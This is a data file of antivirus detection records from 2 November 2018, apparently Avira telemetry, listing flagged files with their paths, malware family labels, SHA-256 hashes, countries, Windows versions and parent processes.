  Row(detection=Row(filename='firefox installer.exe', filepath='\\?\\S:\\   PC-instal\\Firefox Installer.exe', filesize=128000, name='W32/Gael.3666.#M1.#R1'), hash='3a6640d7650a85d6b4029725c1d1c8be872c258553e760b91da2b831603b70bc', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:52:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gdpinst.exe', filepath='D:\\pro\\ahmed hamdy\\install\\driver\\gdi\\32\\eng\\gDPInst.exe', filesize=1000000, name='W32/Sality.AT.#M1.#R1'), hash='3aacc0774a4500eaab8fe162104a75243e73e5d2ee44e8c3ea7e635f3218fcaa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installer_flash_winx86_64-32.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_winx86_64-32-master (1).zip\\winx86_64-32-master\\Installer_Flash_winx86_64-32.exe', filesize=640000, name='TR/AD.MoksSteal.B.#M1.#R1'), hash='3ab0dc374a4c881f90e62fcd8065efec4ce4270f623ef3e53ceb7312802f4d94', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:30:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3acb101f65db262e99d1e72e32521302aba93acff694d03671a4e46c4f5d5a9d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T04:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:13:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='3b0950320e586a4d87626480f0a1c30d2426588664de0c16caf5ba0ba0f25c27', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=297472, timestamp='2018-11-02T20:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='3b0950320e586a4d87626480f0a1c30d2426588664de0c16caf5ba0ba0f25c27', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:40:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3B73BD498639EBC739E66DA0B4199A1F532B20159F5D01485991B2F0BF50CA48', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3b73bd498639ebc739e66da0b4199a1f532b20159f5d01485991b2f0bf50ca48', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T00:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080041-402ad2e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080041-402AD2E0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080002-3bd0afdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080002-3BD0AFDC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075826-313b8f05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-075826-313B8F05', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:58:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='accountpictures.exe', filepath='C:\\Users\\X\\AccountPictures\\AccountPictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080018-3d903028', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080018-3D903028', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080035-3f859221', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080035-3F859221', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080009-3c9ca3ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080009-3C9CA3FF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080014-3d228c29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080014-3D228C29', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080029-3ec687db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080029-3EC687DB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-080022-3e09c44e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-080022-3E09C44E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T07:04:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T03:15:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:28:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111601-8a677e27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357366dc\\AVSCAN-20181102-111537-870389B8\\AVSCAN-20181102-111601-8A677E27', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091301-837e86ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357366dc\\AVSCAN-20181102-091243-80DD926A\\AVSCAN-20181102-091301-837E86BA', filesize=576000, name='TR/Miner.syyzh.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:13:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:32:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:07:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:04:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:05:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102031-d19f4aea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102031-D19F4AEA', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentineldrv32support.exe', filepath='C:\\Program Files\\Common Files\\SafeNet Sentinel\\Sentinel System Driver\\SentinelDrv32Support.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3c3fa414cc0379e2ebe2f84e4cfec87c7fb0aadb4134ecb09ac91ea9bf937926', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LoDbY3aSHkmFpCm8.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-02T08:04:35Z'), dt=datetime.date(2018, 11, 2)),
